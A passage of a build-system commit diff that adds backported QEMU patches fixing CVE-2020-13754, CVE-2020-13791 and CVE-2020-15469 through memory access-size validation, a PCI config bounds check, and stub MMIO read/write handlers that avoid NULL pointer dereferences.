+length.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Richard Henderson <rth@twiddle.net>
+Fixes: CVE-2020-13754
+Fixes: https://bugzilla.redhat.com/show_bug.cgi?id=1842363
+Fixes: a014ed07bd5a ("memory: accept mismatching sizes in memory_region_access_valid")
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+Message-Id: <20200610134731.1514409-1-mst@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=5d971f9e672507210e77d020d89e0e89165c8fc9
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ memory.c | 29 +++++++++--------------------
+ 1 file changed, 9 insertions(+), 20 deletions(-)
+
+diff --git a/memory.c b/memory.c
+index 2f15a4b..9200b20 100644
+--- a/memory.c
++++ b/memory.c
+@@ -1352,35 +1352,24 @@ bool memory_region_access_valid(MemoryRegion *mr,
+                                 bool is_write,
+                                 MemTxAttrs attrs)
+ {
+-    int access_size_min, access_size_max;
+-    int access_size, i;
+-
+-    if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++    if (mr->ops->valid.accepts
++        && !mr->ops->valid.accepts(mr->opaque, addr, size, is_write, attrs)) {
+         return false;
+     }
+ 
+-    if (!mr->ops->valid.accepts) {
+-        return true;
+-    }
+-
+-    access_size_min = mr->ops->valid.min_access_size;
+-    if (!mr->ops->valid.min_access_size) {
+-        access_size_min = 1;
++    if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++        return false;
+     }
+ 
+-    access_size_max = mr->ops->valid.max_access_size;
++    /* Treat zero as compatibility all valid */
+     if (!mr->ops->valid.max_access_size) {
+-        access_size_max = 4;
++        return true;
+     }
+ 
+-    access_size = MAX(MIN(size, access_size_max), access_size_min);
+-    for (i = 0; i < size; i += access_size) {
+-        if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size,
+-                                    is_write, attrs)) {
+-            return false;
+-        }
++    if (size > mr->ops->valid.max_access_size
++        || size < mr->ops->valid.min_access_size) {
++        return false;
+     }
+-
+     return true;
+ }
+ 
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
new file mode 100644
index 0000000000..7354edc54d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
@@ -0,0 +1,69 @@
+From dba04c3488c4699f5afe96f66e448b1d447cf3fb Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 20 Jul 2020 19:06:27 +0300
+Subject: [PATCH] acpi: accept byte and word access to core ACPI registers
+
+All ISA registers should be accessible as bytes, words or dwords
+(if wide enough).  Fix the access constraints for acpi-pm-evt,
+acpi-pm-tmr & acpi-cnt registers.
+
+Fixes: 5d971f9e67 (memory: Revert "memory: accept mismatching sizes in memory_region_access_valid")
+Fixes: afafe4bbe0 (apci: switch cnt to memory api)
+Fixes: 77d58b1e47 (apci: switch timer to memory api)
+Fixes: b5a7c024d2 (apci: switch evt to memory api)
+Buglink: https://lore.kernel.org/xen-devel/20200630170913.123646-1-anthony.perard@citrix.com/T/
+Buglink: https://bugs.debian.org/964793
+BugLink: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964247
+BugLink: https://bugs.launchpad.net/bugs/1886318
+Reported-By: Simon John <git@the-jedi.co.uk>
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <20200720160627.15491-1-mjt@msgid.tls.msk.ru>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=dba04c3488c4699f5afe96f66e448b1d447cf3fb
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/acpi/core.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+diff --git a/hw/acpi/core.c b/hw/acpi/core.c
+index f6d9ec4..ac06db3 100644
+--- a/hw/acpi/core.c
++++ b/hw/acpi/core.c
+@@ -458,7 +458,8 @@ static void acpi_pm_evt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_evt_ops = {
+     .read = acpi_pm_evt_read,
+     .write = acpi_pm_evt_write,
+-    .valid.min_access_size = 2,
++    .impl.min_access_size = 2,
++    .valid.min_access_size = 1,
+     .valid.max_access_size = 2,
+     .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -527,7 +528,8 @@ static void acpi_pm_tmr_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_tmr_ops = {
+     .read = acpi_pm_tmr_read,
+     .write = acpi_pm_tmr_write,
+-    .valid.min_access_size = 4,
++    .impl.min_access_size = 4,
++    .valid.min_access_size = 1,
+     .valid.max_access_size = 4,
+     .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -599,7 +601,8 @@ static void acpi_pm_cnt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_cnt_ops = {
+     .read = acpi_pm_cnt_read,
+     .write = acpi_pm_cnt_write,
+-    .valid.min_access_size = 2,
++    .impl.min_access_size = 2,
++    .valid.min_access_size = 1,
+     .valid.max_access_size = 2,
+     .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
new file mode 100644
index 0000000000..2a8781050f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
@@ -0,0 +1,65 @@
+From 8e67fda2dd6202ccec093fda561107ba14830a17 Mon Sep 17 00:00:00 2001
+From: Laurent Vivier <lvivier@redhat.com>
+Date: Tue, 21 Jul 2020 10:33:22 +0200
+Subject: [PATCH] xhci: fix valid.max_access_size to access address registers
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+QEMU XHCI advertises AC64 (64-bit addressing) but doesn't allow
+64-bit mode access in "runtime" and "operational" MemoryRegionOps.
+
+Set the max_access_size based on sizeof(dma_addr_t) as AC64 is set.
+
+XHCI specs:
+"If the xHC supports 64-bit addressing (AC64 = â1â), then software
+should write 64-bit registers using only Qword accesses.  If a
+system is incapable of issuing Qword accesses, then writes to the
+64-bit address fields shall be performed using 2 Dword accesses;
+low Dword-first, high-Dword second.  If the xHC supports 32-bit
+addressing (AC64 = â0â), then the high Dword of registers containing
+64-bit address fields are unused and software should write addresses
+using only Dword accesses"
+
+The problem has been detected with SLOF, as linux kernel always accesses
+registers using 32-bit access even if AC64 is set and revealed by
+5d971f9e6725 ("memory: Revert "memory: accept mismatching sizes in memory_region_access_valid"")
+
+Suggested-by: Alexey Kardashevskiy <aik@au1.ibm.com>
+Signed-off-by: Laurent Vivier <lvivier@redhat.com>
+Message-id: 20200721083322.90651-1-lvivier@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=8e67fda2dd6202ccec093fda561107ba14830a17
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/hcd-xhci.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
+index b330e36..67a18fe 100644
+--- a/hw/usb/hcd-xhci.c
++++ b/hw/usb/hcd-xhci.c
+@@ -3184,7 +3184,7 @@ static const MemoryRegionOps xhci_oper_ops = {
+     .read = xhci_oper_read,
+     .write = xhci_oper_write,
+     .valid.min_access_size = 4,
+-    .valid.max_access_size = 4,
++    .valid.max_access_size = sizeof(dma_addr_t),
+     .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+ 
+@@ -3200,7 +3200,7 @@ static const MemoryRegionOps xhci_runtime_ops = {
+     .read = xhci_runtime_read,
+     .write = xhci_runtime_write,
+     .valid.min_access_size = 4,
+-    .valid.max_access_size = 4,
++    .valid.max_access_size = sizeof(dma_addr_t),
+     .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+ 
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
new file mode 100644
index 0000000000..6bad07d03f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
@@ -0,0 +1,39 @@
+From 70b78d4e71494c90d2ccb40381336bc9b9a22f79 Mon Sep 17 00:00:00 2001
+From: Alistair Francis <alistair.francis@wdc.com>
+Date: Tue, 30 Jun 2020 13:12:11 -0700
+Subject: [PATCH] hw/riscv: Allow 64 bit access to SiFive CLINT
+
+Commit 5d971f9e672507210e77d020d89e0e89165c8fc9
+"memory: Revert "memory: accept mismatching sizes in
+memory_region_access_valid"" broke most RISC-V boards as they do 64 bit
+accesses to the CLINT and QEMU would trigger a fault. Fix this failure
+by allowing 8 byte accesses.
+
+Signed-off-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: LIU Zhiwei<zhiwei_liu@c-sky.com>
+Message-Id: <122b78825b077e4dfd39b444d3a46fe894a7804c.1593547870.git.alistair.francis@wdc.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=70b78d4e71494c90d2ccb40381336bc9b9a22f79
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/riscv/sifive_clint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/riscv/sifive_clint.c b/hw/riscv/sifive_clint.c
+index b11ffa0..669c21a 100644
+--- a/hw/riscv/sifive_clint.c
++++ b/hw/riscv/sifive_clint.c
+@@ -181,7 +181,7 @@ static const MemoryRegionOps sifive_clint_ops = {
+     .endianness = DEVICE_LITTLE_ENDIAN,
+     .valid = {
+         .min_access_size = 4,
+-        .max_access_size = 4
++        .max_access_size = 8
+     }
+ };
+ 
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
new file mode 100644
index 0000000000..1e8278f7b7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
@@ -0,0 +1,44 @@
+Date: 	Thu, 4 Jun 2020 16:25:24 +0530
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Subject: 	[PATCH v3] ati-vga: check address before reading configuration bytes (CVE-2020-13791)
+
+While reading PCI configuration bytes, a guest may send an
+address towards the end of the configuration space. It may lead
+to an OOB access issue. Add check to ensure 'address + size' is
+within PCI configuration space.
+
+CVE: CVE-2020-13791
+
+Upstream-Status: Submitted
+https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00979.html
+
+Reported-by: Ren Ding <rding@gatech.edu>
+Reported-by: Hanqing Zhao <hanqing@gatech.edu>
+Reported-by: Yi Ren <c4tren@gmail.com>
+Suggested-by: BALATON Zoltan <balaton@eik.bme.hu>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/display/ati.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+Update v3: avoid modifying 'addr' variable
+  -> https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00834.html
+
+diff --git a/hw/display/ati.c b/hw/display/ati.c
+index 67604e68de..b4d0fd88b7 100644
+--- a/hw/display/ati.c
++++ b/hw/display/ati.c
+@@ -387,7 +387,9 @@ static uint64_t ati_mm_read(void *opaque, hwaddr addr, unsigned int size)
+         val = s->regs.crtc_pitch;
+         break;
+     case 0xf00 ... 0xfff:
+-        val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++        if ((addr - 0xf00) + size <= pci_config_size(&s->dev)) {
++            val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++        }
+         break;
+     case CUR_OFFSET:
+         val = s->regs.cur_offset;
+-- 
+2.26.2 
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
new file mode 100644
index 0000000000..20f39f0a26
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
@@ -0,0 +1,50 @@
+From 520f26fc6d17b71a43eaf620e834b3bdf316f3d3 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:25 +0530
+Subject: [PATCH] hw/pci-host: add pci-intack write method
+
+Add pci-intack mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-2-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu
+https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-1.patch?h=ubuntu/focal-security
+Upstream commit  https://github.com/qemu/qemu/commit/520f26fc6d17b71a43eaf620e834b3bdf316f3d3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/prep.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/pci-host/prep.c
++++ b/hw/pci-host/prep.c
+@@ -26,6 +26,7 @@
+ #include "qemu/osdep.h"
+ #include "qemu-common.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qapi/error.h"
+ #include "hw/pci/pci.h"
+ #include "hw/pci/pci_bus.h"
+@@ -119,8 +120,15 @@ static uint64_t raven_intack_read(void *
+     return pic_read_irq(isa_pic);
+ }
+ 
++static void raven_intack_write(void *opaque, hwaddr addr,
++                                        uint64_t data, unsigned size)
++{
++    qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++}
++
+ static const MemoryRegionOps raven_intack_ops = {
+     .read = raven_intack_read,
++    .write = raven_intack_write,
+     .valid = {
+         .max_access_size = 1,
+     },
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
new file mode 100644
index 0000000000..d6715d337c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
@@ -0,0 +1,69 @@
+From 4f2a5202a05fc1612954804a2482f07bff105ea2 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:26 +0530
+Subject: [PATCH] pci-host: designware: add pcie-msi read method
+
+Add pcie-msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-3-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-2.patch?h=ubuntu/focal-security Upstream Commit https://github.com/qemu/qemu/commit/4f2a5202a05fc1612954804a2482f07bff105ea2]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/designware.c | 19 +++++++++++++++++++
+ 1 file changed, 19 insertions(+)
+
+diff --git a/hw/pci-host/designware.c b/hw/pci-host/designware.c
+index f9fb97a..bde3a34 100644
+--- a/hw/pci-host/designware.c
++++ b/hw/pci-host/designware.c
+@@ -21,6 +21,7 @@
+ #include "qemu/osdep.h"
+ #include "qapi/error.h"
+ #include "qemu/module.h"
++#include "qemu/log.h"
+ #include "hw/pci/msi.h"
+ #include "hw/pci/pci_bridge.h"
+ #include "hw/pci/pci_host.h"
+@@ -63,6 +64,23 @@ designware_pcie_root_to_host(DesignwarePCIERoot *root)
+     return DESIGNWARE_PCIE_HOST(bus->parent);
+ }
+ 
++static uint64_t designware_pcie_root_msi_read(void *opaque, hwaddr addr,
++                                              unsigned size)
++{
++    /*
++     * Attempts to read from the MSI address are undefined in
++     * the PCI specifications. For this hardware, the datasheet
++     * specifies that a read from the magic address is simply not
++     * intercepted by the MSI controller, and will go out to the
++     * AHB/AXI bus like any other PCI-device-initiated DMA read.
++     * This is not trivial to implement in QEMU, so since
++     * well-behaved guests won't ever ask a PCI device to DMA from
++     * this address we just log the missing functionality.
++     */
++    qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++    return 0;
++}
++
+ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+                                            uint64_t val, unsigned len)
+ {
+@@ -77,6 +95,7 @@ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ }
+ 
+ static const MemoryRegionOps designware_pci_host_msi_ops = {
++    .read = designware_pcie_root_msi_read,
+     .write = designware_pcie_root_msi_write,
+     .endianness = DEVICE_LITTLE_ENDIAN,
+     .valid = {
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
new file mode 100644
index 0000000000..85abe8ff32
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
@@ -0,0 +1,49 @@
+From 24202d2b561c3b4c48bd28383c8c34b4ac66c2bf Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:27 +0530
+Subject: [PATCH] vfio: add quirk device write method
+
+Add vfio quirk device mmio write method to avoid NULL pointer
+dereference issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Acked-by: Alex Williamson <alex.williamson@redhat.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-4-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/24202d2b561c3b4c48bd28383c8c34b4ac66c2bf]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/vfio/pci-quirks.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/vfio/pci-quirks.c
++++ b/hw/vfio/pci-quirks.c
+@@ -13,6 +13,7 @@
+ #include "qemu/osdep.h"
+ #include "exec/memop.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qemu/error-report.h"
+ #include "qemu/main-loop.h"
+ #include "qemu/module.h"
+@@ -278,8 +279,15 @@ static uint64_t vfio_ati_3c3_quirk_read(
+     return data;
+ }
+ 
++static void vfio_ati_3c3_quirk_write(void *opaque, hwaddr addr,
++                                        uint64_t data, unsigned size)
++{
++    qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps vfio_ati_3c3_quirk = {
+     .read = vfio_ati_3c3_quirk_read,
++    .write = vfio_ati_3c3_quirk_write,
+     .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+ 
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
new file mode 100644
index 0000000000..52fac8a051
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
@@ -0,0 +1,53 @@
+From f867cebaedbc9c43189f102e4cdfdff05e88df7f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:28 +0530
+Subject: [PATCH] prep: add ppc-parity write method
+
+Add ppc-parity mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-5-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/f867cebaedbc9c43189f102e4cdfdff05e88df7f]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/prep_systemio.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/ppc/prep_systemio.c b/hw/ppc/prep_systemio.c
+index 4e48ef2..b2bd783 100644
+--- a/hw/ppc/prep_systemio.c
++++ b/hw/ppc/prep_systemio.c
+@@ -23,6 +23,7 @@
+  */
+ 
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "hw/irq.h"
+ #include "hw/isa/isa.h"
+ #include "hw/qdev-properties.h"
+@@ -235,8 +236,15 @@ static uint64_t ppc_parity_error_readl(void *opaque, hwaddr addr,
+     return val;
+ }
+ 
++static void ppc_parity_error_writel(void *opaque, hwaddr addr,
++                                    uint64_t data, unsigned size)
++{
++    qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps ppc_parity_error_ops = {
+     .read = ppc_parity_error_readl,
++    .write = ppc_parity_error_writel,
+     .valid = {
+         .min_access_size = 4,
+         .max_access_size = 4,
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
new file mode 100644
index 0000000000..49c6c5e3e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
@@ -0,0 +1,53 @@
+From b5bf601f364e1a14ca4c3276f88dfec024acf613 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:29 +0530
+Subject: [PATCH] nvram: add nrf51_soc flash read method
+
+Add nrf51_soc mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-6-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b5bf601f364e1a14ca4c3276f88dfec024acf613 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/nvram/nrf51_nvm.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/hw/nvram/nrf51_nvm.c b/hw/nvram/nrf51_nvm.c
+index f2283c1..7b3460d 100644
+--- a/hw/nvram/nrf51_nvm.c
++++ b/hw/nvram/nrf51_nvm.c
+@@ -273,6 +273,15 @@ static const MemoryRegionOps io_ops = {
+         .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+ 
++static uint64_t flash_read(void *opaque, hwaddr offset, unsigned size)
++{
++    /*
++     * This is a rom_device MemoryRegion which is always in
++     * romd_mode (we never put it in MMIO mode), so reads always
++     * go directly to RAM and never come here.
++     */
++    g_assert_not_reached();
++}
+ 
+ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+         unsigned int size)
+@@ -300,6 +309,7 @@ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+ 
+ 
+ static const MemoryRegionOps flash_ops = {
++    .read = flash_read,
+     .write = flash_write,
+     .valid.min_access_size = 4,
+     .valid.max_access_size = 4,
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
new file mode 100644
index 0000000000..115be68295
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
@@ -0,0 +1,61 @@
+Backport of:
+
+From 921604e175b8ec06c39503310e7b3ec1e3eafe9e Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:30 +0530
+Subject: [PATCH] spapr_pci: add spapr msi read method
+
+Add spapr msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-7-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-6.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/921604e175b8ec06c39503310e7b3ec1e3eafe9e]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/spapr_pci.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+--- a/hw/ppc/spapr_pci.c
++++ b/hw/ppc/spapr_pci.c
+@@ -52,6 +52,7 @@
+ #include "sysemu/kvm.h"
+ #include "sysemu/hostmem.h"
+ #include "sysemu/numa.h"
++#include "qemu/log.h"
+ 
+ /* Copied from the kernel arch/powerpc/platforms/pseries/msi.c */
+ #define RTAS_QUERY_FN           0
+@@ -738,6 +739,12 @@ static PCIINTxRoute spapr_route_intx_pin
+     return route;
+ }
+ 
++static uint64_t spapr_msi_read(void *opaque, hwaddr addr, unsigned size)
++{
++    qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++    return 0;
++}
++
+ /*
+  * MSI/MSIX memory region implementation.
+  * The handler handles both MSI and MSIX.
+@@ -755,8 +762,11 @@ static void spapr_msi_write(void *opaque
+ }
+ 
+ static const MemoryRegionOps spapr_msi_ops = {
+-    /* There is no .read as the read result is undefined by PCI spec */
+-    .read = NULL,
++    /*
++     * .read result is undefined by PCI spec.
++     * define .read method to avoid assert failure in memory_region_init_io
++     */
++    .read = spapr_msi_read,
+     .write = spapr_msi_write,
+     .endianness = DEVICE_LITTLE_ENDIAN
+ };
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
new file mode 100644
index 0000000000..7d8ec32251
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
@@ -0,0 +1,50 @@
+From 2c9fb3b784000c1df32231e1c2464bb2e3fc4620 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:31 +0530
+Subject: [PATCH] tz-ppc: add dummy read/write methods
+
+Add tz-ppc-dummy mmio read/write methods to avoid assert failure
+during initialisation.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-8-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-7.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/2c9fb3b784000c1df32231e1c2464bb2e3fc4620 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/tz-ppc.c | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/hw/misc/tz-ppc.c b/hw/misc/tz-ppc.c
+index 6431257..36495c6 100644
+--- a/hw/misc/tz-ppc.c
++++ b/hw/misc/tz-ppc.c
+@@ -196,7 +196,21 @@ static bool tz_ppc_dummy_accepts(void *opaque, hwaddr addr,
+     g_assert_not_reached();
+ }
+ 
++static uint64_t tz_ppc_dummy_read(void *opaque, hwaddr addr, unsigned size)
++{
++    g_assert_not_reached();
++}
++
